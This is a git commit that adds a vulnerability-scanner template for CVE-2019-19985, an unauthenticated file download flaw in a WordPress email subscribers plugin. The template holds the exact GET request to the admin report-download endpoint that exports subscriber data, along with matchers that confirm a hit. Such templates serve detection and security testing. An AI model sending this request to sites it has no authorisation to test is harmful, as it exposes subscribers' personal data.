Added CVE-2019-19985

patch-1
bauthard 2020-08-05 01:49:57 +05:30
parent 140f069e55
commit e4ecdde5e0
1 changed files with 23 additions and 0 deletions

23
cves/CVE-2019-19985.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2019-19985
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and
matchers:
- type: word
words:
- Subscribed
- type: status
status:
- 200